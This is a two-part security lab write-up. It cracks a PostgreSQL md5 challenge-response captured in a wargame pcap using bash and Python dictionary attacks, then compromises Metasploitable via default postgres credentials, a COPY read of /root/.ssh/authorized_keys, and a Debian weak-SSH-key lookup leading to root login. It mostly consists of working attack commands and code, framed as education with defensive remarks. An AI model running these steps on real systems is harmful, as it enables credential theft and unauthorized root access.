
# Postgres password challenge (md5, salt)

Introduction

The 'networking 3' challenge of the 2011 sbd wargame hands out a pcap of an authentication against a PostgreSQL database. PostgreSQL's md5 method has the client answer a 4-byte server salt with md5(md5(password || user) || salt), so once the three values below are recovered from the capture the password can be guessed offline against a wordlist:
User: postgres
Salt: 0e5da2d1
Response hash (hex, 'md5' prefix stripped): 6fcd671f668c3c8efca3308f6f41bd17

Execution
# cat diccionario.txt
hack
tracking
Jixi
wargame
# cat postgres_md5_salt.sh
#!/bin/bash
# Usage: ./postgres_md5_salt.sh <user> <salt_hex> <wordlist> <captured_hash>
# PostgreSQL md5 auth: response = md5( md5(password || user) || salt ), where salt is the
# 4 raw bytes from the AuthenticationMD5Password message (given here as hex, as Wireshark shows it).

function hex2ascii {
 printf %s "$1" | xxd -r -p
}
function md5 {
 printf %s "$1" | md5sum | cut -d ' ' -f1
}

user=$1
# Caveat: a bash variable cannot hold a 0x00 byte and $(...) strips trailing 0x0a, so a salt
# containing either will not survive this step.
salt=$(hex2ascii "$2")
password_file=$3
captured_password=$4

# '|| [ -n "$secret" ]' keeps a last line that lacks a trailing newline.
while IFS= read -r secret || [ -n "$secret" ]
do
 # Stage 1 is exactly what pg_authid.rolpassword stores for an md5 role (minus the "md5" prefix).
 hash_stage_1=$(md5 "$secret$user")
 # Stage 2 is what crosses the wire in the PasswordMessage.
 generated_password=$(md5 "$hash_stage_1$salt")
 if [ "$generated_password" = "$captured_password" ]
 then
  echo "$secret --> $captured_password"
 fi
done < "$password_file"
# ./postgres_md5_salt.sh postgres 0e5da2d1 \
diccionario.txt \
6fcd671f668c3c8efca3308f6f41bd17
Jixi --> 6fcd671f668c3c8efca3308f6f41bd17
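The same computation in Python, added here as a worked example (it is not code from the post): it builds and parses the two protocol messages the pcap contained (the server's AuthenticationMD5Password carrying the 4-byte salt, and the client's PasswordMessage), derives the response either from the cleartext or directly from the stored pg_authid form, and runs the dictionary attack. The user, salt, hash and wordlist are the post's; the message layouts follow the PostgreSQL frontend/backend protocol; the function names are this example's own.

```python
import hashlib
import struct
from typing import Iterable, Optional

# Values taken from the post (recovered from the challenge pcap).
USER = "postgres"
SALT_HEX = "0e5da2d1"
CAPTURED = "6fcd671f668c3c8efca3308f6f41bd17"
WORDLIST = ["hack", "tracking", "Jixi", "wargame"]


def pg_md5_stored(password: str, user: str) -> str:
    """Stage 1: what pg_authid.rolpassword holds for an md5 role: 'md5' + hex(md5(password || user))."""
    return "md5" + hashlib.md5((password + user).encode()).hexdigest()


def pg_md5_response_from_stored(stored: str, salt: bytes) -> str:
    """Stage 2 computed from the stored form alone: 'md5' + hex(md5(stage1_hex || salt)).
    The cleartext is never needed, so a leaked pg_authid hash logs in as-is (pass-the-hash)."""
    if not stored.startswith("md5") or len(stored) != 35:
        raise ValueError("not an md5-encrypted rolpassword")
    return "md5" + hashlib.md5(stored[3:].encode() + salt).hexdigest()


def pg_md5_response(password: str, user: str, salt: bytes) -> str:
    """What the client puts in PasswordMessage, starting from the cleartext password."""
    return pg_md5_response_from_stored(pg_md5_stored(password, user), salt)


def build_auth_md5_request(salt: bytes) -> bytes:
    """Server -> client AuthenticationMD5Password: 'R', Int32 length (12), Int32 code (5), 4-byte salt."""
    if len(salt) != 4:
        raise ValueError("md5 salt is exactly 4 bytes")
    return b"R" + struct.pack("!ii", 12, 5) + salt


def parse_auth_md5_request(msg: bytes) -> bytes:
    """Pull the salt out of an AuthenticationMD5Password message (what the pcap showed as 0e5da2d1)."""
    if len(msg) != 13 or msg[:1] != b"R":
        raise ValueError("not a 13-byte Authentication message")
    length, code = struct.unpack("!ii", msg[1:9])
    if (length, code) != (12, 5):
        raise ValueError("not AuthenticationMD5Password")
    return msg[9:]


def build_password_message(response: str) -> bytes:
    """Client -> server PasswordMessage: 'p', Int32 length (self-inclusive, tag excluded), NUL-terminated string."""
    body = response.encode() + b"\x00"
    return b"p" + struct.pack("!i", 4 + len(body)) + body


def parse_password_message(msg: bytes) -> str:
    """Recover the 'md5...' string from a PasswordMessage."""
    if msg[:1] != b"p":
        raise ValueError("not a PasswordMessage")
    (length,) = struct.unpack("!i", msg[1:5])
    body = msg[5:1 + length]
    if not body.endswith(b"\x00"):
        raise ValueError("PasswordMessage string is not NUL-terminated")
    return body[:-1].decode()


def crack(captured: str, user: str, salt: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack. Stage 1 depends only on the user and stage 2 on this session's
    4-byte salt, so each candidate costs two MD5s and nothing rate-limits the attacker."""
    want = captured.lower()
    if want.startswith("md5"):
        want = want[3:]
    for word in wordlist:
        if pg_md5_response(word, user, salt)[3:] == want:
            return word
    return None


if __name__ == "__main__":
    salt = parse_auth_md5_request(build_auth_md5_request(bytes.fromhex(SALT_HEX)))
    print("salt:", salt.hex())
    print("cracked:", crack(CAPTURED, USER, salt, WORDLIST))
```

Two things the shell version hides are visible here: the wire response can be computed from the stored 'md5...' value alone, so a dump of pg_authid is itself a credential for md5 roles; and the salt is 4 bytes and per session, so it only prevents replay and does nothing against offline guessing. Both are why scram-sha-256 (password_encryption = scram-sha-256, the default since PostgreSQL 14) replaced md5: per-user salt, iterated hashing, and a stored verifier that cannot by itself be replayed as the wire response.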

# Metasploitable (postgres + openssl)

Introduction

Metasploitable runs a PostgreSQL server that still accepts the default postgres:postgres credentials. That role is a database superuser, so COPY ... FROM reads any file the server process can open, here /root/.ssh/authorized_keys. The key it reveals was generated on a Debian system with the broken OpenSSL PRNG (CVE-2008-0166), so its private half sits in the precomputed keyset distributed with the 'Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)', which is enough to log in as root.

Execution
# msfconsole
msf > nmap -sV -O -p 22,5432 192.168.1.50
[*] exec: nmap -sV -O -p 22,5432 192.168.1.50

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
5432/tcp open  postgresql PostgreSQL DB
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop
Service Info: OS: Linux

msf > search postgres
msf > use scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set rhosts 192.168.1.50
msf auxiliary(postgres_login) > exploit
[+] 192.168.1.50:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.1.50:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_login) > psql -h 192.168.1.50 -U postgres -W
[*] exec: psql -h 192.168.1.50 -U postgres -W

Password for user postgres:
create table sshkey (input text);
-- COPY ... FROM '<file>' opens the file on the server, as the postgres OS user;
-- it needs a superuser role (or pg_read_server_files from PostgreSQL 11 on).
copy sshkey from '/root/.ssh/authorized_keys';
select * from sshkey;
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 row)
# wget http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
# tar xvjf debian_ssh_rsa_2048_x86.tar.bz2
# cd rsa/2048
# grep -l AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
57c3115d77c56390332dc5c49978627a-5429.pub
# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.50
root@metasploitable:~# uname -a
Linux metasploitable 2.6.24-16-server
root@metasploitable:~# whoami
root
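The grep at the end of the walk-through finds the private key by searching the .pub files for the base64 blob as a substring. The Python below, added here as a worked example (not code from the post or from the exploit archive), does the same lookup properly: it parses authorized_keys lines including an options prefix, checks that the type field agrees with the blob, indexes the weak set by blob so comments and labels do not matter, and reports the OpenSSH SHA256 fingerprint next to the .pub name to pass to ssh -i. Only the leaked blob and the .pub name 57c3115d77c56390332dc5c49978627a-5429.pub come from the post; the decoy keys, the second .pub name and the sample authorized_keys text are constructed for this example.

```python
import base64
import hashlib
import re
import struct
from typing import Dict, List, Optional, Tuple

# Public-key blob the post dumped out of /root/.ssh/authorized_keys; in the post it matched
# 57c3115d77c56390332dc5c49978627a-5429.pub. All other data below is constructed sample data.
LEAKED_BLOB = (
    "AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW7"
    "6IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa6"
    "6X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9Iyh"
    "tRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w=="
)

KEY_RE = re.compile(
    r"(?:^|\s)(ssh-rsa|ssh-dss|ssh-ed25519|ecdsa-sha2-nistp(?:256|384|521))"
    r"\s+([A-Za-z0-9+/=]+)(?:\s+(\S.*?))?\s*$"
)


def fake_blob(seed: int) -> str:
    """Constructed, syntactically valid 'ssh-rsa' blob (tiny e and n); sample data only, not a real key."""
    body = (b"\x00\x00\x00\x07ssh-rsa" + b"\x00\x00\x00\x01\x03"
            + b"\x00\x00\x00\x10" + bytes((seed + i) % 256 for i in range(16)))
    return base64.b64encode(body).decode()


# Constructed authorized_keys content in the shape the COPY dump shows: a comment,
# a key carrying options, and the leaked key.
AUTHORIZED_KEYS = (
    "# constructed sample file\n"
    f'from="10.0.0.0/8",no-pty ssh-rsa {fake_blob(1)} backup@host\n'
    f"ssh-rsa {LEAKED_BLOB} msfadmin@metasploitable\n"
)

# Stand-in for the rsa/2048 directory: .pub file name -> file contents. Only the first
# name comes from the post; the second name and its key are constructed.
WEAK_PUBS: Dict[str, str] = {
    "57c3115d77c56390332dc5c49978627a-5429.pub": f"ssh-rsa {LEAKED_BLOB} root@debian\n",
    "00000000000000000000000000000000-1.pub": f"ssh-rsa {fake_blob(2)} root@debian\n",
}


def blob_type(blob_b64: str) -> str:
    """Key type encoded inside the blob (length-prefixed string), independent of the text field."""
    raw = base64.b64decode(blob_b64, validate=True)
    (n,) = struct.unpack("!I", raw[:4])
    return raw[4:4 + n].decode()


def fingerprint_sha256(blob_b64: str) -> str:
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of sha256(decoded blob)."""
    raw = base64.b64decode(blob_b64, validate=True)
    return "SHA256:" + base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")


def parse_authorized_key(line: str) -> Optional[Tuple[str, str, str, str]]:
    """(options, keytype, blob, comment) for one line; None for blank or comment lines.
    Options such as from="..." or command="..." precede the key type and may contain spaces,
    so the line is anchored on the key type instead of being split on whitespace."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    m = KEY_RE.search(stripped)
    if not m:
        raise ValueError(f"unrecognised authorized_keys line: {stripped[:40]}...")
    options = stripped[:m.start(1)].strip()
    keytype, blob, comment = m.group(1), m.group(2), m.group(3) or ""
    if blob_type(blob) != keytype:
        raise ValueError("key type field does not match the blob")
    return options, keytype, blob, comment


def index_weak_keys(pubs: Dict[str, str]) -> Dict[str, str]:
    """blob -> .pub file name. Indexing on the blob alone (never the comment or the whole
    line) is what lets the match survive whatever label the key was installed with."""
    index: Dict[str, str] = {}
    for name, content in pubs.items():
        for line in content.splitlines():
            parsed = parse_authorized_key(line)
            if parsed:
                index[parsed[2]] = name
    return index


def find_weak_keys(authorized_keys: str, weak_index: Dict[str, str]) -> List[Tuple[int, str, str, str]]:
    """(line number, .pub name, comment, fingerprint) for every authorized key in the weak set.
    The private key is the .pub name without its extension, i.e. the -i argument for ssh."""
    hits = []
    for lineno, line in enumerate(authorized_keys.splitlines(), start=1):
        parsed = parse_authorized_key(line)
        if parsed and parsed[2] in weak_index:
            hits.append((lineno, weak_index[parsed[2]], parsed[3], fingerprint_sha256(parsed[2])))
    return hits


if __name__ == "__main__":
    for lineno, pub, comment, fp in find_weak_keys(AUTHORIZED_KEYS, index_weak_keys(WEAK_PUBS)):
        print(f"line {lineno}: {comment} {fp} -> ssh -i {pub[:-4]} root@<host>")
```

To run it against the real keyset, replace WEAK_PUBS with the contents of the rsa/2048 .pub files and AUTHORIZED_KEYS with the rows returned by the COPY dump; the same index also answers the defensive question, whether any key in a fleet's authorized_keys or known_hosts came from the affected generator.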